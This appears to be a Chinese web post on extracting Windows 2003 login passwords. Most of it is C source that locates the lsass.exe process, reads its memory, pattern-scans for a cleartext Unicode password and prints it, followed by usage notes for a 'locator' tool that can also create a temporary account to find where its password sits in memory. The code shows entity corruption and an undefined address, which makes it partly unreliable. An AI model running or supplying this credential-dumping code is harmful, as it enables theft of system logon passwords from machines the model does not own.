如何在win 2003中得到登陆密码

 if (i < nSize)
{
ZeroMemory(Password，sizeof(Password));
for (; i < nSize ; i++)
{
if (Buffer == 0x02 amp;amp; Buffer[i + 1] == 0 amp;amp; Buffer[i + 2] == 0 amp;amp; Buffer[i + 3] == 0 amp;amp; Buffer[i + 4] == 0 amp;amp; Buffer[i + 5] == 0 amp;amp; Buffer[i + 6] == 0)
{
/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format，So We Will Do It In
That Way
*/
j = i + 7;
for (; j < nSize; j += 2)
{
if (Buffer[j] > 0)
{
Password[Count++] = Buffer[j];
}
else
{
break;
}
}
return i + 7; // One Flag To Indicate We Find The Password
}
}
}
return -1; // Well，We Fail To Find The Password，And This Always Happens
}
// End Search

//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters: None
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
HANDLE hProcessSnap;
HANDLE hProcess = NULL;
PROCESSENTRY32 pe32;
DWORD PID = 0;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS， 0);
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
printf("Fail To Create Snap Shot\n");
return 0;
}

pe32.dwSize = sizeof(PROCESSENTRY32);

if( !Process32First(hProcessSnap， pe32))
{
CloseHandle(hProcessSnap); // Must clean up the snapshot object!
return 0;
}

do
{
if (strcmpi(pe32.szExeFile，"Lsass.EXE") == 0)
{
PID = pe32.th32ProcessID;
break;
}
}while(Process32Next( hProcessSnap， pe32));

CloseHandle( hProcessSnap);
return PID;
}
// End GetLsassPID()

//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:
// In: DWORD PID -> The Lsass.exe's PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
HANDLE hProcess = NULL;
char Buffer[5 * 1024] = ;
DWORD ByteGet = 0;
int Found = -1;

hProcess = OpenProcess(PROCESS_VM_READ，FALSE，PID); // Open Process
if (hProcess == NULL)
{
printf("Fail To Open Process\n");
return FALSE;
}

if (!ReadProcessMemory(hProcess，(PVOID)BaseAddress，Buffer，5 * 1024，amp;ByteGet)) // Read The Memory From Lsass.exe
{
printf("Fail To Read Memory\n");
CloseHandle(hProcess);
return FALSE;
}

CloseHandle(hProcess);

Found = Search(Buffer，ByteGet); // Search The Password
if (Found >= 0) // We May Find The Password
{
if (strlen(Password) > 0) // Yes，We Find The Password Even We Don't Know If The Password Is Correct Or Not
{
printf("Found Password At #0x%x -> \"%s\"\n"，Found + BaseAddress，Password);
}
}
else
{
printf("Fail To Find The Password\n");
}
return TRUE;
}
// End FindPassword

//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters: None
//------------------------------------------------------------------------------------
BOOL Is2003()
{
OSVERSIONINFOEX osvi;
BOOL b0sVersionInfoEx;
ZeroMemory(amp;osvi，sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)amp;osvi)))
{
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
}
return (osvi.dwMajorVersion == 5 amp;amp; osvi.dwMinorVersion == 2);
}
// End Is2003()
// End Of File

　　附件程序相当于密码定位程序，用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.

　　用法:

　　1.locator 字符串 -> 在lsass进程内存中搜索指定的那个"字符串"，返回确定的位置

　　2.Locator 用户名 密码 -> 在系统中建立一个参数指定的用户，并进行模拟登陆，然后搜索"密码"在lsass进程内存中的位置，生成的帐户程序运行完后会自动删除。